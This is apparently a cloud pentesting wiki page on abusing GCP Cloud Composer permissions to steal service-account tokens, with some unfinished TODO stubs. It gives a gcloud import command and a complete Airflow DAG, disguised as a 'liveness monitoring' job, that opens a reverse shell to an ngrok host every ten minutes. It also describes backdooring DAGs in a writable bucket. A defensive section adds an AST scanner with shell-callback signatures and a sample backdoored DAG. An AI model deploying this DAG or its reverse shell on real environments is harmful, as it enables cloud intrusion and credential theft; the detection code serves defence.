With that permission it is possible to attach any service account to a new Composer environment. Afterwards you can execute code inside Composer to steal the token of that service account.
Add the Python DAG code to a file and import it by running:

```bash
# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
```
Reverse shell DAG:

reverse_shell.py

```python
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta

default_args = {
    'start_date': airflow.utils.dates.days_ago(0),
    'retries': 1,
    'retry_delay': timedelta(minutes=5)
}

dag = DAG(
    'reverse_shell',
    default_args=default_args,
    description='liveness monitoring dag',
    schedule_interval='*/10 * * * *',
    max_active_runs=1,
    catchup=False,
    dagrun_timeout=timedelta(minutes=10),
)

# priority_weight has type int in Airflow DB, uses the maximum.
t1 = BashOperator(
    task_id='bash_rev',
    bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
    dag=dag,
    depends_on_past=False,
    priority_weight=2**31-1,
    do_xcom_push=False
)
```
Write Access to the Composer bucket

All the components of a Composer environment (DAGs, plugins and data) are stored inside a GCP bucket. If an attacker has read and write permissions over it, they can monitor the bucket and, whenever a DAG is created or updated, submit a backdoored version so that the Composer environment fetches that backdoored version from storage.
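Since the DAG bucket is the delivery point for both the imported DAG above and the backdoored-update scenario, one defensive control is a static scan of DAG sources pulled from the bucket. The following is an added detection example, not code from the original page: it parses each DAG file with `ast`, flags `BashOperator` tasks whose `bash_command` carries shell-callback signatures, and flags the extreme `priority_weight` trick; the two DAG strings and the `203.0.113.5` host are constructed sample inputs.

```python
import ast
import operator
# Constructed sample DAG sources (not real bucket contents): one mimicking the
# backdoor pattern described above, one benign DAG that also uses BashOperator.
SUSPICIOUS_DAG = """
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
dag = DAG('reverse_shell', schedule_interval='*/10 * * * *')
t1 = BashOperator(task_id='bash_rev', dag=dag, priority_weight=2**31-1,
                  bash_command='bash -i >& /dev/tcp/203.0.113.5/4444 0>&1')
"""
BENIGN_DAG = """
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
dag = DAG('cleanup', schedule_interval='@daily')
t1 = BashOperator(task_id='rm_tmp', bash_command='rm -rf /tmp/scratch/*', dag=dag)
"""
# Substrings typical of shell callbacks; extend the tuple for your environment.
SIGNATURES = ('/dev/tcp/', 'bash -i', '0>&1', 'nc -e', 'mkfifo')
PRIORITY_THRESHOLD = 1_000_000  # far above any sane scheduling hint
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Pow: operator.pow}

def _const_int(node):
    """Fold an int literal or a +,-,*,** expression of int literals; None otherwise."""
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        left, right = _const_int(node.left), _const_int(node.right)
        if left is not None and right is not None:
            return _OPS[type(node.op)](left, right)
    return None

def scan_dag_source(source):
    """Return (task_id, reason) findings for every BashOperator call in a DAG file."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == 'BashOperator'):
            continue
        kw = {k.arg: k.value for k in node.keywords if k.arg}
        task = kw.get('task_id')
        task_id = task.value if isinstance(task, ast.Constant) else '<dynamic>'
        cmd = kw.get('bash_command')
        cmd_text = cmd.value if isinstance(cmd, ast.Constant) and isinstance(cmd.value, str) else ''
        for sig in SIGNATURES:
            if sig in cmd_text:
                findings.append((task_id, f'bash_command contains {sig!r}'))
        weight = _const_int(kw.get('priority_weight'))
        if weight is not None and weight > PRIORITY_THRESHOLD:
            findings.append((task_id, f'priority_weight={weight} forces the task to run first'))
    return findings
```

Run it over every `.py` object in the environment's `dags/` prefix (for example from a scheduled job with read-only bucket access) and alert on any non-empty result; a bucket-level object-change notification gives the trigger for the same scan.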
Find more information about this attack in:
Inject Plugins

TODO: Check what can be compromised by uploading plugins

Inject Data

TODO: Check what can be compromised by uploading data